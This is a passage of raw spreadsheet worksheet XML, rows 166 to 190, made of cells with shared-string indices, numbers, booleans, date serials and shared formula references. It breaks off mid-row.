      <c r="O166" s="1" t="s">
        <v>875</v>
      </c>
      <c r="P166" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q166" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R166" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S166" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="1">
        <v>1626.0</v>
      </c>
      <c r="B167" s="2" t="s">
        <v>881</v>
      </c>
      <c r="C167" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D167" s="2" t="s">
        <v>882</v>
      </c>
      <c r="E167" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F167" s="1" t="s">
        <v>883</v>
      </c>
      <c r="G167" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H167" s="1" t="s">
        <v>884</v>
      </c>
      <c r="I167" s="1" t="s">
        <v>885</v>
      </c>
      <c r="J167" s="1" t="s">
        <v>886</v>
      </c>
      <c r="K167" s="2" t="s">
        <v>887</v>
      </c>
      <c r="L167" s="1">
        <v>1.0</v>
      </c>
      <c r="M167" s="1">
        <v>1.0</v>
      </c>
      <c r="N167" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O167" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P167" s="1" t="s">
        <v>888</v>
      </c>
      <c r="Q167" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R167" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S167" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="1">
        <v>1633.0</v>
      </c>
      <c r="B168" s="2" t="s">
        <v>889</v>
      </c>
      <c r="C168" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D168" s="2" t="s">
        <v>890</v>
      </c>
      <c r="E168" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F168" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G168" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H168" s="1" t="s">
        <v>891</v>
      </c>
      <c r="I168" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J168" s="1" t="s">
        <v>892</v>
      </c>
      <c r="K168" s="2" t="s">
        <v>893</v>
      </c>
      <c r="L168" s="1">
        <v>1.0</v>
      </c>
      <c r="M168" s="1">
        <v>1.0</v>
      </c>
      <c r="N168" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O168" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P168" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q168" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R168" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S168" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="1">
        <v>2098.0</v>
      </c>
      <c r="B169" s="2" t="s">
        <v>894</v>
      </c>
      <c r="C169" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D169" s="2" t="s">
        <v>895</v>
      </c>
      <c r="E169" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F169" s="1" t="s">
        <v>896</v>
      </c>
      <c r="G169" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H169" s="1" t="s">
        <v>897</v>
      </c>
      <c r="I169" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J169" s="1" t="s">
        <v>898</v>
      </c>
      <c r="K169" s="2" t="s">
        <v>899</v>
      </c>
      <c r="L169" s="1">
        <v>7.0</v>
      </c>
      <c r="M169" s="1">
        <v>8.0</v>
      </c>
      <c r="N169" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O169" s="1" t="s">
        <v>900</v>
      </c>
      <c r="P169" s="1" t="s">
        <v>901</v>
      </c>
      <c r="Q169" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R169" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S169" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="1">
        <v>2136.0</v>
      </c>
      <c r="B170" s="2" t="s">
        <v>902</v>
      </c>
      <c r="C170" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D170" s="2" t="s">
        <v>903</v>
      </c>
      <c r="E170" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F170" s="1" t="s">
        <v>904</v>
      </c>
      <c r="G170" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H170" s="1" t="s">
        <v>905</v>
      </c>
      <c r="I170" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J170" s="1" t="s">
        <v>906</v>
      </c>
      <c r="K170" s="2" t="s">
        <v>907</v>
      </c>
      <c r="L170" s="1">
        <v>1.0</v>
      </c>
      <c r="M170" s="1">
        <v>1.0</v>
      </c>
      <c r="N170" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O170" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P170" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q170" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R170" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S170" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="1">
        <v>2170.0</v>
      </c>
      <c r="B171" s="2" t="s">
        <v>908</v>
      </c>
      <c r="C171" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D171" s="2" t="s">
        <v>909</v>
      </c>
      <c r="E171" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F171" s="1" t="s">
        <v>910</v>
      </c>
      <c r="G171" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H171" s="1" t="s">
        <v>911</v>
      </c>
      <c r="I171" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J171" s="1" t="s">
        <v>912</v>
      </c>
      <c r="K171" s="2" t="s">
        <v>913</v>
      </c>
      <c r="L171" s="1">
        <v>5.0</v>
      </c>
      <c r="M171" s="1">
        <v>7.0</v>
      </c>
      <c r="N171" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O171" s="1" t="s">
        <v>914</v>
      </c>
      <c r="P171" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q171" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R171" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S171" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="1">
        <v>2171.0</v>
      </c>
      <c r="B172" s="2" t="s">
        <v>915</v>
      </c>
      <c r="C172" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D172" s="2" t="s">
        <v>916</v>
      </c>
      <c r="E172" s="2" t="s">
        <v>917</v>
      </c>
      <c r="F172" s="1" t="s">
        <v>918</v>
      </c>
      <c r="G172" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H172" s="1" t="s">
        <v>919</v>
      </c>
      <c r="I172" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J172" s="1" t="s">
        <v>912</v>
      </c>
      <c r="K172" s="2" t="s">
        <v>913</v>
      </c>
      <c r="L172" s="1">
        <v>5.0</v>
      </c>
      <c r="M172" s="1">
        <v>7.0</v>
      </c>
      <c r="N172" s="1" t="s">
        <v>920</v>
      </c>
      <c r="O172" s="1" t="s">
        <v>914</v>
      </c>
      <c r="P172" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q172" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R172" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S172" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="1">
        <v>2172.0</v>
      </c>
      <c r="B173" s="2" t="s">
        <v>921</v>
      </c>
      <c r="C173" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D173" s="2" t="s">
        <v>922</v>
      </c>
      <c r="E173" s="2" t="s">
        <v>917</v>
      </c>
      <c r="F173" s="1" t="s">
        <v>923</v>
      </c>
      <c r="G173" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H173" s="1" t="s">
        <v>924</v>
      </c>
      <c r="I173" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J173" s="1" t="s">
        <v>912</v>
      </c>
      <c r="K173" s="2" t="s">
        <v>913</v>
      </c>
      <c r="L173" s="1">
        <v>5.0</v>
      </c>
      <c r="M173" s="1">
        <v>7.0</v>
      </c>
      <c r="N173" s="1" t="s">
        <v>925</v>
      </c>
      <c r="O173" s="1" t="s">
        <v>914</v>
      </c>
      <c r="P173" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q173" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R173" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S173" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="1">
        <v>2281.0</v>
      </c>
      <c r="B174" s="2" t="s">
        <v>926</v>
      </c>
      <c r="C174" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D174" s="2" t="s">
        <v>927</v>
      </c>
      <c r="E174" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F174" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G174" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H174" s="1" t="s">
        <v>928</v>
      </c>
      <c r="I174" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J174" s="1" t="s">
        <v>929</v>
      </c>
      <c r="K174" s="2" t="s">
        <v>930</v>
      </c>
      <c r="L174" s="1">
        <v>1.0</v>
      </c>
      <c r="M174" s="1">
        <v>1.0</v>
      </c>
      <c r="N174" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O174" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P174" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q174" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R174" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S174" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="1">
        <v>2353.0</v>
      </c>
      <c r="B175" s="2" t="s">
        <v>931</v>
      </c>
      <c r="C175" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D175" s="2" t="s">
        <v>932</v>
      </c>
      <c r="E175" s="2" t="s">
        <v>60</v>
      </c>
      <c r="F175" s="1" t="s">
        <v>933</v>
      </c>
      <c r="G175" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H175" s="1" t="s">
        <v>934</v>
      </c>
      <c r="I175" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J175" s="1" t="s">
        <v>935</v>
      </c>
      <c r="K175" s="2" t="s">
        <v>936</v>
      </c>
      <c r="L175" s="1">
        <v>5.0</v>
      </c>
      <c r="M175" s="1">
        <v>7.0</v>
      </c>
      <c r="N175" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O175" s="1" t="s">
        <v>937</v>
      </c>
      <c r="P175" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q175" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R175" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S175" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="1">
        <v>2354.0</v>
      </c>
      <c r="B176" s="2" t="s">
        <v>938</v>
      </c>
      <c r="C176" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D176" s="2" t="s">
        <v>939</v>
      </c>
      <c r="E176" s="2" t="s">
        <v>940</v>
      </c>
      <c r="F176" s="1" t="s">
        <v>941</v>
      </c>
      <c r="G176" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H176" s="1" t="s">
        <v>942</v>
      </c>
      <c r="I176" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J176" s="1" t="s">
        <v>935</v>
      </c>
      <c r="K176" s="2" t="s">
        <v>936</v>
      </c>
      <c r="L176" s="1">
        <v>5.0</v>
      </c>
      <c r="M176" s="1">
        <v>7.0</v>
      </c>
      <c r="N176" s="1" t="s">
        <v>677</v>
      </c>
      <c r="O176" s="1" t="s">
        <v>937</v>
      </c>
      <c r="P176" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q176" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R176" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S176" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="1">
        <v>2356.0</v>
      </c>
      <c r="B177" s="2" t="s">
        <v>943</v>
      </c>
      <c r="C177" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D177" s="2" t="s">
        <v>939</v>
      </c>
      <c r="E177" s="2" t="s">
        <v>940</v>
      </c>
      <c r="F177" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G177" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H177" s="1" t="s">
        <v>944</v>
      </c>
      <c r="I177" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J177" s="1" t="s">
        <v>935</v>
      </c>
      <c r="K177" s="2" t="s">
        <v>936</v>
      </c>
      <c r="L177" s="1">
        <v>5.0</v>
      </c>
      <c r="M177" s="1">
        <v>7.0</v>
      </c>
      <c r="N177" s="1" t="s">
        <v>945</v>
      </c>
      <c r="O177" s="1" t="s">
        <v>937</v>
      </c>
      <c r="P177" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q177" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R177" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S177" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="1">
        <v>2357.0</v>
      </c>
      <c r="B178" s="2" t="s">
        <v>946</v>
      </c>
      <c r="C178" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D178" s="2" t="s">
        <v>947</v>
      </c>
      <c r="E178" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F178" s="1" t="s">
        <v>933</v>
      </c>
      <c r="G178" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H178" s="1" t="s">
        <v>948</v>
      </c>
      <c r="I178" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J178" s="1" t="s">
        <v>935</v>
      </c>
      <c r="K178" s="2" t="s">
        <v>936</v>
      </c>
      <c r="L178" s="1">
        <v>5.0</v>
      </c>
      <c r="M178" s="1">
        <v>7.0</v>
      </c>
      <c r="N178" s="1" t="s">
        <v>949</v>
      </c>
      <c r="O178" s="1" t="s">
        <v>937</v>
      </c>
      <c r="P178" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q178" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R178" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S178" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="1">
        <v>2366.0</v>
      </c>
      <c r="B179" s="2" t="s">
        <v>950</v>
      </c>
      <c r="C179" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D179" s="2" t="s">
        <v>951</v>
      </c>
      <c r="E179" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F179" s="1" t="s">
        <v>952</v>
      </c>
      <c r="G179" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H179" s="4">
        <v>44534.572916666664</v>
      </c>
      <c r="I179" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J179" s="1" t="s">
        <v>953</v>
      </c>
      <c r="K179" s="2" t="s">
        <v>954</v>
      </c>
      <c r="L179" s="1">
        <v>4.0</v>
      </c>
      <c r="M179" s="1">
        <v>9.0</v>
      </c>
      <c r="N179" s="1" t="s">
        <v>955</v>
      </c>
      <c r="O179" s="1" t="s">
        <v>956</v>
      </c>
      <c r="P179" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q179" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R179" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S179" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="1">
        <v>2435.0</v>
      </c>
      <c r="B180" s="2" t="s">
        <v>957</v>
      </c>
      <c r="C180" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D180" s="2" t="s">
        <v>958</v>
      </c>
      <c r="E180" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F180" s="1" t="s">
        <v>959</v>
      </c>
      <c r="G180" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H180" s="1" t="s">
        <v>960</v>
      </c>
      <c r="I180" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J180" s="1" t="s">
        <v>961</v>
      </c>
      <c r="K180" s="2" t="s">
        <v>962</v>
      </c>
      <c r="L180" s="1">
        <v>3.0</v>
      </c>
      <c r="M180" s="1">
        <v>3.0</v>
      </c>
      <c r="N180" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O180" s="1" t="s">
        <v>963</v>
      </c>
      <c r="P180" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q180" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R180" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S180" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="1">
        <v>2457.0</v>
      </c>
      <c r="B181" s="2" t="s">
        <v>964</v>
      </c>
      <c r="C181" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D181" s="2" t="s">
        <v>965</v>
      </c>
      <c r="E181" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F181" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G181" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H181" s="1" t="s">
        <v>966</v>
      </c>
      <c r="I181" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J181" s="1" t="s">
        <v>967</v>
      </c>
      <c r="K181" s="2" t="s">
        <v>968</v>
      </c>
      <c r="L181" s="1">
        <v>8.0</v>
      </c>
      <c r="M181" s="1">
        <v>24.0</v>
      </c>
      <c r="N181" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O181" s="1" t="s">
        <v>969</v>
      </c>
      <c r="P181" s="1" t="s">
        <v>970</v>
      </c>
      <c r="Q181" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R181" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S181" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="1">
        <v>2494.0</v>
      </c>
      <c r="B182" s="2" t="s">
        <v>971</v>
      </c>
      <c r="C182" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D182" s="2" t="s">
        <v>972</v>
      </c>
      <c r="E182" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F182" s="1" t="s">
        <v>973</v>
      </c>
      <c r="G182" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H182" s="1" t="s">
        <v>974</v>
      </c>
      <c r="I182" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J182" s="1" t="s">
        <v>975</v>
      </c>
      <c r="K182" s="2" t="s">
        <v>976</v>
      </c>
      <c r="L182" s="1">
        <v>3.0</v>
      </c>
      <c r="M182" s="1">
        <v>5.0</v>
      </c>
      <c r="N182" s="1" t="s">
        <v>330</v>
      </c>
      <c r="O182" s="1" t="s">
        <v>977</v>
      </c>
      <c r="P182" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q182" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R182" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S182" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="1">
        <v>2495.0</v>
      </c>
      <c r="B183" s="2" t="s">
        <v>978</v>
      </c>
      <c r="C183" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D183" s="2" t="s">
        <v>979</v>
      </c>
      <c r="E183" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F183" s="1" t="s">
        <v>980</v>
      </c>
      <c r="G183" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H183" s="1" t="s">
        <v>981</v>
      </c>
      <c r="I183" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J183" s="1" t="s">
        <v>975</v>
      </c>
      <c r="K183" s="2" t="s">
        <v>976</v>
      </c>
      <c r="L183" s="1">
        <v>3.0</v>
      </c>
      <c r="M183" s="1">
        <v>5.0</v>
      </c>
      <c r="N183" s="1" t="s">
        <v>982</v>
      </c>
      <c r="O183" s="1" t="s">
        <v>977</v>
      </c>
      <c r="P183" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q183" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R183" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S183" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="1">
        <v>2527.0</v>
      </c>
      <c r="B184" s="2" t="s">
        <v>983</v>
      </c>
      <c r="C184" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D184" s="2" t="s">
        <v>984</v>
      </c>
      <c r="E184" s="2" t="s">
        <v>89</v>
      </c>
      <c r="F184" s="1" t="s">
        <v>985</v>
      </c>
      <c r="G184" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H184" s="1" t="s">
        <v>986</v>
      </c>
      <c r="I184" s="1" t="s">
        <v>987</v>
      </c>
      <c r="J184" s="1" t="s">
        <v>988</v>
      </c>
      <c r="K184" s="2" t="s">
        <v>989</v>
      </c>
      <c r="L184" s="1">
        <v>24.0</v>
      </c>
      <c r="M184" s="1">
        <v>26.0</v>
      </c>
      <c r="N184" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O184" s="1" t="s">
        <v>990</v>
      </c>
      <c r="P184" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q184" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R184" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S184" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="1">
        <v>2556.0</v>
      </c>
      <c r="B185" s="2" t="s">
        <v>991</v>
      </c>
      <c r="C185" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D185" s="2" t="s">
        <v>992</v>
      </c>
      <c r="E185" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F185" s="1" t="s">
        <v>993</v>
      </c>
      <c r="G185" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H185" s="4">
        <v>44628.85555555556</v>
      </c>
      <c r="I185" s="1" t="s">
        <v>994</v>
      </c>
      <c r="J185" s="1" t="s">
        <v>995</v>
      </c>
      <c r="K185" s="2" t="s">
        <v>996</v>
      </c>
      <c r="L185" s="1">
        <v>4.0</v>
      </c>
      <c r="M185" s="1">
        <v>5.0</v>
      </c>
      <c r="N185" s="1" t="s">
        <v>997</v>
      </c>
      <c r="O185" s="1" t="s">
        <v>998</v>
      </c>
      <c r="P185" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q185" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R185" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S185" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="1">
        <v>2558.0</v>
      </c>
      <c r="B186" s="2" t="s">
        <v>999</v>
      </c>
      <c r="C186" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D186" s="2" t="s">
        <v>1000</v>
      </c>
      <c r="E186" s="2" t="s">
        <v>1001</v>
      </c>
      <c r="F186" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G186" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H186" s="1" t="s">
        <v>1003</v>
      </c>
      <c r="I186" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J186" s="1" t="s">
        <v>1004</v>
      </c>
      <c r="K186" s="2" t="s">
        <v>1005</v>
      </c>
      <c r="L186" s="1">
        <v>2.0</v>
      </c>
      <c r="M186" s="1">
        <v>3.0</v>
      </c>
      <c r="N186" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O186" s="1" t="s">
        <v>1006</v>
      </c>
      <c r="P186" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q186" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R186" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S186" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="1">
        <v>2560.0</v>
      </c>
      <c r="B187" s="2" t="s">
        <v>1007</v>
      </c>
      <c r="C187" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D187" s="2" t="s">
        <v>1008</v>
      </c>
      <c r="E187" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F187" s="1" t="s">
        <v>1009</v>
      </c>
      <c r="G187" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H187" s="1" t="s">
        <v>1010</v>
      </c>
      <c r="I187" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J187" s="1" t="s">
        <v>1004</v>
      </c>
      <c r="K187" s="2" t="s">
        <v>1005</v>
      </c>
      <c r="L187" s="1">
        <v>2.0</v>
      </c>
      <c r="M187" s="1">
        <v>3.0</v>
      </c>
      <c r="N187" s="1" t="s">
        <v>1011</v>
      </c>
      <c r="O187" s="1" t="s">
        <v>1006</v>
      </c>
      <c r="P187" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q187" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R187" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S187" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="1">
        <v>2564.0</v>
      </c>
      <c r="B188" s="2" t="s">
        <v>1012</v>
      </c>
      <c r="C188" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D188" s="2" t="s">
        <v>1000</v>
      </c>
      <c r="E188" s="2" t="s">
        <v>1001</v>
      </c>
      <c r="F188" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G188" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H188" s="1" t="s">
        <v>1013</v>
      </c>
      <c r="I188" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J188" s="1" t="s">
        <v>1014</v>
      </c>
      <c r="K188" s="2" t="s">
        <v>1015</v>
      </c>
      <c r="L188" s="1">
        <v>3.0</v>
      </c>
      <c r="M188" s="1">
        <v>4.0</v>
      </c>
      <c r="N188" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O188" s="1" t="s">
        <v>1016</v>
      </c>
      <c r="P188" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q188" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R188" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S188" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="1">
        <v>2570.0</v>
      </c>
      <c r="B189" s="2" t="s">
        <v>1017</v>
      </c>
      <c r="C189" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D189" s="2" t="s">
        <v>1000</v>
      </c>
      <c r="E189" s="2" t="s">
        <v>1001</v>
      </c>
      <c r="F189" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G189" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H189" s="4">
        <v>44293.02777777778</v>
      </c>
      <c r="I189" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J189" s="1" t="s">
        <v>1018</v>
      </c>
      <c r="K189" s="2" t="s">
        <v>1019</v>
      </c>
      <c r="L189" s="1">
        <v>2.0</v>
      </c>
      <c r="M189" s="1">
        <v>4.0</v>
      </c>
      <c r="N189" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O189" s="1" t="s">
        <v>1020</v>
      </c>
      <c r="P189" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q189" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R189" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S189" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="1">
        <v>2572.0</v>
      </c>
      <c r="B190" s="2" t="s">
        <v>1021</v>
      </c>
      <c r="C190" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D190" s="2" t="s">
        <v>1022</v>
      </c>
      <c r="E190" s="2" t="s">
        <v>405</v>
      </c>
      <c r="F190" s="1" t="s">
        <v>1002</v>
      </c>
      <c r="G190" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H190" s="4">
        <v>44293.64444444444</v>
